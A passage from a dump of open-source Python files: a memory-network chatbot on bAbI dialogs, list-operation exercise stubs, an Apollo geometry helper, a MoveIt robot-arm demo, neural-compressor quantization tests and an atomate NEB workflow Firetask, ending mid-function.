for key in self.candidates_to_idx)
# Initialize data and build vocabulary
self.train_data = train_data
self.test_data = test_data
self.val_data = val_data
self.build_vocab(train_data + test_data + val_data, candidates)
# Vectorize candidates
self.candidates_vec = vectorize_candidates(
candidates, self.word_idx, self.candidate_sentence_size)
# Initialize optimizer
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# Initialize TensorFlow session and Memory Network model
self.sess = tf.Session()
self.model = MemoryNetwork(
self.sentence_size, self.vocab_size,
self.candidates_size, self.candidates_vec,
embedding_size, hops,
optimizer=optimizer, session=self.sess)
def build_vocab(self, data, candidates):
# Build word vocabulary set from all data and candidate words
vocab = reduce(lambda x1, x2: x1 | x2,
(set(list(chain.from_iterable(facts)) + questions)
for facts, questions, answers in data))
vocab |= reduce(lambda x1, x2: x1 | x2,
(set(candidate) for candidate in candidates))
vocab = sorted(vocab)
# Assign integer indices to each word
self.word_idx = dict((word, idx + 1) for idx, word in enumerate(vocab))
# Compute various data size numbers
max_facts_size = max(map(len, (facts for facts, _, _ in data)))
self.sentence_size = max(
map(len, chain.from_iterable(facts for facts, _, _ in data)))
self.candidate_sentence_size = max(map(len, candidates))
question_size = max(map(len, (questions for _, questions, _ in data)))
self.memory_size = min(self.memory_size, max_facts_size)
self.vocab_size = len(self.word_idx) + 1 # +1 for null word
self.sentence_size = max(question_size, self.sentence_size)
def predict_for_batch(self, facts, questions):
preds = []
# Iterate over mini-batches
for start in range(0, len(facts), self.batch_size):
end = start + self.batch_size
facts_batch = facts[start:end]
questions_batch = questions[start:end]
# Predict per batch
pred = self.model.predict(facts_batch, questions_batch)
preds += list(pred)
return preds
def train(self):
# Vectorize training and validation data
train_facts, train_questions, train_answers = vectorize_data(
self.train_data, self.word_idx, self.sentence_size,
self.batch_size, self.memory_size)
val_facts, val_questions, val_answers = vectorize_data(
self.val_data, self.word_idx, self.sentence_size,
self.batch_size, self.memory_size)
# Chunk training data into batches
batches = zip(range(0, len(train_facts) - self.batch_size,
self.batch_size),
range(self.batch_size, len(train_facts),
self.batch_size))
batches = [(start, end) for start, end in batches]
# Start training loop
for epoch in range(1, self.epochs + 1):
np.random.shuffle(batches)
total_cost = 0.0
for start, end in batches:
facts = train_facts[start:end]
questions = train_questions[start:end]
answers = train_answers[start:end]
# Train on batch
batch_cost = self.model.fit(facts, questions, answers)
total_cost += batch_cost
if epoch % self.evaluation_interval == 0:
# Compute accuracy over training and validation set
train_preds = self.predict_for_batch(
train_facts, train_questions)
val_preds = self.predict_for_batch(
val_facts, val_questions)
train_acc = metrics.accuracy_score(
train_preds, train_answers)
val_acc = metrics.accuracy_score(
val_preds, val_answers)
print("Epoch: ", epoch)
print("Total Cost: ", total_cost)
print("Training Accuracy: ", train_acc)
print("Validation Accuracy: ", val_acc)
print("---")
def test(self):
# Compute accuracy over test set
test_facts, test_questions, test_answers = vectorize_data(
self.test_data, self.word_idx, self.sentence_size,
self.batch_size, self.memory_size)
test_preds = self.predict_for_batch(test_facts, test_questions)
test_acc = metrics.accuracy_score(test_preds, test_answers)
print("Testing Accuracy: ", test_acc)
def interactive_mode(self):
facts = []
utterance = None
response = None
turn_count = 1
while True:
line = input("==> ").strip().lower()
if line == "exit":
break
if line == "restart":
facts = []
turn_count = 1
print("Restarting dialog...\n")
continue
utterance = tokenize(line)
data = [(facts, utterance, -1)]
# Vectorize data and make prediction
f, q, a = vectorize_data(data, self.word_idx,
self.sentence_size, self.batch_size, self.memory_size)
preds = self.model.predict(f, q)
response = self.idx_to_candidates[preds[0]]
# Print predicted response
print(response)
response = tokenize(response)
# Add turn count temporal encoding
utterance.append("$u")
response.append("$r")
# Add utterance/response encoding
utterance.append("#" + str(turn_count))
response.append("#" + str(turn_count))
# Update facts memory
facts.append(utterance)
facts.append(response)
turn_count += 1
if __name__ == "__main__":
candidates = []
candidates_to_idx = {}
with open('dialog-babi/dialog-babi-candidates.txt') as f:
for i, line in enumerate(f):
candidates_to_idx[line.strip().split(' ', 1)[1]] = i
line = tokenize(line.strip())[1:]
candidates.append(line)
train_data = []
with open('dialog-babi/dialog-babi-task5-full-dialogs-trn.txt') as f:
train_data = parse_dialogs_per_response(f.readlines(), candidates_to_idx)
test_data = []
with open('dialog-babi/dialog-babi-task5-full-dialogs-tst.txt') as f:
test_data = parse_dialogs_per_response(f.readlines(), candidates_to_idx)
val_data = []
with open('dialog-babi/dialog-babi-task5-full-dialogs-dev.txt') as f:
val_data = parse_dialogs_per_response(f.readlines(), candidates_to_idx)
chatbot = ChatBotWrapper(train_data, test_data, val_data,
candidates, candidates_to_idx,
memory_size=50,
batch_size=32,
learning_rate=0.001,
evaluation_interval=10,
hops=3,
epochs=200,
embedding_size=50)
chatbot.train()
chatbot.test()
chatbot.interactive_mode()
|
exercises/list-ops/list_ops.py
|
kishankj/python
| 1,177 |
101430
|
<gh_stars>1000+
def append(list1, list2):
pass
def concat(lists):
pass
def filter(function, list):
pass
def length(list):
pass
def map(function, list):
pass
def foldl(function, list, initial):
pass
def foldr(function, list, initial):
pass
def reverse(list):
pass
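# --- Hedged reference sketch (added for illustration; the exercise intentionally
# leaves the stubs above unimplemented) ---
# One straightforward way the operations could be written, avoiding the built-in
# helpers they emulate; argument conventions here are an assumption of this sketch.
#
#     def append(list1, list2):
#         return list1 + list2
#
#     def concat(lists):
#         return [item for inner in lists for item in inner]
#
#     def filter(function, list):
#         return [item for item in list if function(item)]
#
#     def length(list):
#         return sum(1 for _ in list)
#
#     def map(function, list):
#         return [function(item) for item in list]
#
#     def foldl(function, list, initial):
#         result = initial
#         for item in list:
#             result = function(result, item)
#         return result
#
#     def foldr(function, list, initial):
#         result = initial
#         for item in reversed(list):
#             result = function(result, item)
#         return result
#
#     def reverse(list):
#         return list[::-1]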
|
modules/tools/prediction/data_pipelines/common/util.py
|
jzjonah/apollo
| 22,688 |
101439
|
<reponame>jzjonah/apollo<filename>modules/tools/prediction/data_pipelines/common/util.py
#!/usr/bin/env python3
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
def segment_overlap(a, b, x, y):
if b < x or a > y:
return False
return True
def vector_projection_overlap(p0, p1, p2, p3):
v = p1.subtract(p0)
n_square = v.norm_square()
v0 = p2.subtract(p0)
v1 = p3.subtract(p0)
t0 = v0.dot(v)
t1 = v1.dot(v)
if t0 > t1:
t = t0
t0 = t1
t1 = t
return segment_overlap(t0, t1, 0.0, n_square)
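# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# `vector_projection_overlap` only needs points exposing subtract / dot / norm_square,
# so a tiny stand-in class is enough to exercise it. `_Vec2` below is hypothetical and
# exists only for this example; Apollo's own point type is used in the real pipeline.
class _Vec2:
    def __init__(self, x, y):
        self.x, self.y = x, y

    def subtract(self, other):
        return _Vec2(self.x - other.x, self.y - other.y)

    def dot(self, other):
        return self.x * other.x + self.y * other.y

    def norm_square(self):
        return self.x * self.x + self.y * self.y


if __name__ == '__main__':
    # segment p0-p1 lies along the x axis; p2-p3 projects onto it with overlap
    p0, p1 = _Vec2(0.0, 0.0), _Vec2(4.0, 0.0)
    p2, p3 = _Vec2(3.0, 1.0), _Vec2(6.0, 1.0)
    print(vector_projection_overlap(p0, p1, p2, p3))  # True: projections [12, 24] and [0, 16] overlap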
|
planning&perception/moveit_skill/probot_demo/scripts/moveit_fk_demo.py
|
Hinson-A/guyueclass
| 227 |
101448
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2019 Wuhan PS-Micro Technology Co., Itd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy, sys
import moveit_commander
class MoveItFkDemo:
def __init__(self):
# Initialize the move_group API
moveit_commander.roscpp_initialize(sys.argv)
# Initialize the ROS node
rospy.init_node('moveit_fk_demo', anonymous=True)
# Initialize the arm group of the manipulator that will be controlled through move group
arm = moveit_commander.MoveGroupCommander('manipulator')
# Set the allowed goal tolerance for arm motion
arm.set_goal_joint_tolerance(0.001)
# Set the maximum allowed velocity and acceleration scaling factors
arm.set_max_acceleration_scaling_factor(0.5)
arm.set_max_velocity_scaling_factor(0.5)
# Move the arm back to its home position first
arm.set_named_target('home')
arm.go()
rospy.sleep(1)
# Set the arm's target position, described by the six joint values (unit: radians)
joint_positions = [0.391410, -0.676384, -0.376217, 0.0, 1.052834, 0.454125]
arm.set_joint_value_target(joint_positions)
# Execute the arm motion
arm.go()
rospy.sleep(1)
# Move the arm back to its home position
arm.set_named_target('home')
arm.go()
rospy.sleep(1)
# Shut down and exit MoveIt
moveit_commander.roscpp_shutdown()
moveit_commander.os._exit(0)
if __name__ == "__main__":
try:
MoveItFkDemo()
except rospy.ROSInterruptException:
pass
|
test/test_tensorflow_recipe.py
|
huggingface/neural-compressor
| 172 |
101456
|
<reponame>huggingface/neural-compressor
#
# -*- coding: utf-8 -*-
#
import unittest
import os
import yaml
import tensorflow as tf
from tensorflow.python.framework import graph_util
from neural_compressor.adaptor.tf_utils.util import disable_random
def build_fake_yaml_disable_first_quantization():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
first_conv_or_matmul_quantization: False
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_disable_first_quantization.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_enable_first_quantization():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
first_conv_or_matmul_quantization: True
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_enable_first_quantization.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_disable_scale_propagation():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_max_pooling: False
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_disable_scale_propagation.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_enable_scale_propagation():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_max_pooling: True
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_enable_scale_propagation.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_enable_scale_unification():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_concat: True
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_enable_scale_unification.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_disable_scale_unification():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
scale_propagation_concat: False
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_disable_scale_unification.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
class TestTensorflowInt8Recipe(unittest.TestCase):
@classmethod
def setUpClass(self):
build_fake_yaml_disable_first_quantization()
build_fake_yaml_enable_first_quantization()
build_fake_yaml_disable_scale_propagation()
build_fake_yaml_enable_scale_propagation()
build_fake_yaml_enable_scale_unification()
build_fake_yaml_disable_scale_unification()
@classmethod
def tearDownClass(self):
os.remove('fake_yaml_disable_first_quantization.yaml')
os.remove('fake_yaml_enable_first_quantization.yaml')
os.remove('fake_yaml_disable_scale_propagation.yaml')
os.remove('fake_yaml_enable_scale_propagation.yaml')
os.remove('fake_yaml_disable_scale_unification.yaml')
os.remove('fake_yaml_enable_scale_unification.yaml')
@disable_random()
def test_disable_first_quantization(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
relu6 = tf.nn.relu6(relu, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_disable_first_quantization.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
found_fp32_conv = False
for i in output_graph.graph_def.node:
if i.op == 'Conv2D':
found_fp32_conv = True
break
self.assertEqual(found_fp32_conv, True)
@disable_random()
def test_enable_first_quantization(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
relu6 = tf.nn.relu6(relu, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_enable_first_quantization.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
found_fp32_conv = False
for i in output_graph.graph_def.node:
if i.op == 'Conv2D':
found_fp32_conv = True
break
self.assertEqual(found_fp32_conv, False)
@disable_random()
def test_enable_scale_propagation(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 30, 30, 1], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 1, 1],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [1],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
conv = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
pool = tf.nn.avg_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv1 = tf.nn.conv2d(pool, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
x = tf.nn.relu(conv_bias)
final_node = tf.nn.relu(x, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_enable_scale_propagation.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 30, 30, 1), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(1, len(set(max_freezed_out)))
@disable_random()
def test_disable_scale_propagation(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 30, 30, 1], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 1, 1],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [1],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
conv = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
pool = tf.nn.avg_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv1 = tf.nn.conv2d(pool, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
x = tf.nn.relu(conv_bias)
final_node = tf.nn.relu(x, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_disable_scale_propagation.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 30, 30, 1), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(2, len(set(max_freezed_out)))
@disable_random()
def test_enable_scale_unification(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 128, 128, 16], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [16],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
sqrt = tf.math.sqrt(x)
relu_sqrt = tf.nn.relu(sqrt)
conv = tf.nn.conv2d(relu_sqrt, conv_weights, strides=[
1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
conv1 = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
relu1 = tf.nn.relu(conv_bias)
concat = tf.concat([relu, relu1], 1)
final_node = tf.nn.relu(concat, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_enable_scale_unification.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 128, 128, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(1, len(set(max_freezed_out)))
@disable_random()
def test_disable_scale_unification(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 30, 30, 1], name="input")
conv_weights = tf.compat.v1.get_variable("weight", [2, 2, 1, 1],
initializer=tf.compat.v1.random_normal_initializer())
conv_bias = tf.compat.v1.get_variable("bias", [1],
initializer=tf.compat.v1.random_normal_initializer())
x = tf.nn.relu(x)
sqrt = tf.math.sqrt(x)
relu_sqrt = tf.nn.relu(sqrt)
conv = tf.nn.conv2d(relu_sqrt, conv_weights, strides=[
1, 2, 2, 1], padding="SAME", name='last')
normed = tf.compat.v1.layers.batch_normalization(conv)
relu = tf.nn.relu(normed)
conv1 = tf.nn.conv2d(x, conv_weights, strides=[1, 2, 2, 1], padding="SAME", name='last')
conv_bias = tf.nn.bias_add(conv1, conv_bias)
relu1 = tf.nn.relu(conv_bias)
concat = tf.concat([relu, relu1], 1)
final_node = tf.nn.relu(concat, name='op_to_store')
out_name = final_node.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('fake_yaml_disable_scale_unification.yaml')
dataset = quantizer.dataset('dummy', shape=(100, 30, 30, 1), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.eval_dataloader = common.DataLoader(dataset)
quantizer.model = output_graph_def
output_graph = quantizer.fit()
max_freezed_out = []
for i in output_graph.graph_def.node:
if i.op == 'QuantizedConv2DWithBiasAndReluAndRequantize':
max_freezed_out.append(i.input[-1])
self.assertEqual(2, len(set(max_freezed_out)))
if __name__ == '__main__':
unittest.main()
|
atomate/vasp/firetasks/approx_neb_dynamic_tasks.py
|
rkingsbury/atomate
| 167 |
101493
|
from fireworks import FiretaskBase, FWAction, explicit_serialize, Workflow
from atomate.utils.utils import env_chk
from atomate.vasp.database import VaspCalcDb
from atomate.vasp.fireworks.approx_neb import ImageFW
from atomate.common.powerups import powerup_by_kwargs
__author__ = "<NAME>"
__email__ = "<EMAIL>"
@explicit_serialize
class GetImageFireworks(FiretaskBase):
"""
Adds ImageFWs to the workflow for the provided images_key
according to the scheme specified by launch_mode. Optional
parameters such as "handler_group", "add_additional_fields",
and "add_tags" can be used to modify the resulting ImageFWs.
Args:
db_file (str): path to file containing the database
credentials.
approx_neb_wf_uuid (str): unique id for approx neb workflow
record keeping.
images_key (str): specifies a key corresponding to the images
field of the approx_neb collection which specifies the
desired combination of end points to interpolate images
between. images_key should be a string of format "0+1",
"0+2", etc. matching end_points_combo input of
PathfinderToDb Firetask or pathfinder_key input of
AddSelectiveDynamics Firetask. If images_key is not
provided images will be launched for all paths/keys in
the approx_neb collection images field.
launch_mode (str): "all" or "screening"
vasp_cmd (str): the name of the full executable for running
VASP.
Optional Params:
vasp_input_set (VaspInputSet class): can use to
define VASP input parameters.
See pymatgen.io.vasp.sets module for more
information. MPRelaxSet() and
override_default_vasp_params are used if
vasp_input_set = None.
override_default_vasp_params (dict): if provided,
vasp_input_set is disregarded and the Vasp Input
Set is created by passing
override_default_vasp_params to MPRelaxSet().
Allows for easy modification of MPRelaxSet().
For example, to set ISIF=2 in the INCAR use:
{"user_incar_settings":{"ISIF":2}}
handler_group (str or [ErrorHandler]): group of handlers to
use for RunVaspCustodian firetask. See handler_groups
dict in the code for the groups and complete list of
handlers in each group. Alternatively, you can specify a
list of ErrorHandler objects.
add_additional_fields (dict): dict of additional fields to
add to task docs (by additional_fields of VaspToDb).
add_tags (list of strings): added to the "tags" field of the
task docs.
"""
required_params = [
"db_file",
"approx_neb_wf_uuid",
"images_key",
"launch_mode",
"vasp_cmd",
]
optional_params = [
"vasp_input_set",
"override_default_vasp_params",
"handler_group",
"add_additional_fields",
"add_tags",
]
def run_task(self, fw_spec):
# get the database connection
db_file = env_chk(self["db_file"], fw_spec)
mmdb = VaspCalcDb.from_db_file(db_file, admin=True)
mmdb.collection = mmdb.db["approx_neb"]
wf_uuid = self["approx_neb_wf_uuid"]
launch_mode = self["launch_mode"]
images_key = self["images_key"]
approx_neb_doc = mmdb.collection.find_one({"wf_uuid": wf_uuid}, {"images": 1})
all_images = approx_neb_doc["images"]
# get structure_path of desired images and sort into structure_paths
if images_key and isinstance(all_images, (dict)):
images = all_images[images_key]
max_n = len(images)
if launch_mode == "all":
structure_paths = [
"images." + images_key + "." + str(n) + ".input_structure"
for n in range(0, max_n)
]
elif launch_mode == "screening":
structure_paths = self.get_and_sort_paths(
max_n=max_n, images_key=images_key
)
elif isinstance(all_images, (dict)):
structure_paths = dict()
if launch_mode == "all":
for key, images in all_images.items():
max_n = len(images)
structure_paths[key] = [
"images." + key + "." + str(n) + ".input_structure"
for n in range(0, max_n)
]
elif launch_mode == "screening":
for key, images in all_images.items():
structure_paths[key] = self.get_and_sort_paths(
max_n=len(images), images_key=key
)
# get list of fireworks to launch
if isinstance(structure_paths, (list)):
if isinstance(structure_paths[0], (str)):
relax_image_fws = []
for path in structure_paths:
relax_image_fws.append(self.get_fw(structure_path=path))
else:
relax_image_fws = self.get_screening_fws(sorted_paths=structure_paths)
elif isinstance(structure_paths, (dict)):
relax_image_fws = []
if launch_mode == "all":
for key in structure_paths.keys():
for path in structure_paths[key]:
relax_image_fws.append(self.get_fw(structure_path=path))
elif launch_mode == "screening":
for key in structure_paths.keys():
sorted_paths = structure_paths[key]
relax_image_fws.extend(
self.get_screening_fws(sorted_paths=sorted_paths)
)
# place fws in temporary wf in order to use powerup_by_kwargs
# to apply powerups to image fireworks
if "vasp_powerups" in fw_spec.keys():
temp_wf = Workflow(relax_image_fws)
powerup_dicts = fw_spec["vasp_powerups"]
temp_wf = powerup_by_kwargs(temp_wf, powerup_dicts)
relax_image_fws = temp_wf.fws
return FWAction(additions=relax_image_fws)
def get_and_sort_paths(self, max_n, images_key=""):
sorted_paths = [[], [], []]
mid_n = int(max_n / 2)
q1 = int((max_n - mid_n) / 2) # for second screening pass
q3 = int((max_n + mid_n) / 2) # for second screening pass
for n in range(0, max_n):
path = "images." + images_key + "." + str(n) + ".input_structure"
if n == mid_n: # path for first screening pass (center image index)
sorted_paths[0].append(path)
elif n in [q1, q3]:
sorted_paths[1].append(path)
else:
sorted_paths[-1].append(path)
return sorted_paths
def get_fw(self, structure_path, parents=None):
add_tags = self.get("add_tags")
fw = ImageFW(
approx_neb_wf_uuid=self["approx_neb_wf_uuid"],
structure_path=structure_path,
db_file=self["db_file"],
vasp_input_set=self.get("vasp_input_set"),
vasp_cmd=self["vasp_cmd"],
override_default_vasp_params=self.get("override_default_vasp_params"),
handler_group=self.get("handler_group"),
parents=parents,
add_additional_fields=self.get("add_additional_fields"),
add_tags=add_tags,
)
if isinstance(add_tags, (list)):
if "tags" in fw.spec.keys():
fw.spec["tags"].extend(add_tags)
else:
fw.spec["tags"] = add_tags
return fw
def get_screening_fws(self, sorted_paths):
if (not isinstance(sorted_paths, list)
        or len(sorted_paths) != 3
        or not all(isinstance(i, list) for i in sorted_paths)):
    raise TypeError("sorted_paths must be a list containing 3 lists")
s1_fw = self.get_fw(structure_path=sorted_paths[0][0])
# ToDo: modify this firework to add firetask that checks whether to run/defuse children
s2_fws = []
for path in sorted_paths[1]:
s2_fws.append(self.get_fw(structure_path=path, parents=s1_fw))
# ToDo: modify this firework to add firetask that checks whether to run/defuse children
remaining_fws = []
for path in sorted_paths[-1]:
remaining_fws.append(self.get_fw(structure_path=path, parents=s2_fws))
return [s1_fw] + s2_fws + remaining_fws
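# A standalone sketch (illustrative only, not used by the firetask above) of the
# "screening" launch order produced by get_and_sort_paths: for max_n images the middle
# image is relaxed first, the two quarter-point images second, and the remaining images
# last as children of the second pass.
def sort_image_indexes_for_screening(max_n):
    mid_n = int(max_n / 2)
    q1 = int((max_n - mid_n) / 2)  # second screening pass
    q3 = int((max_n + mid_n) / 2)  # second screening pass
    first, second, rest = [], [], []
    for n in range(max_n):
        if n == mid_n:
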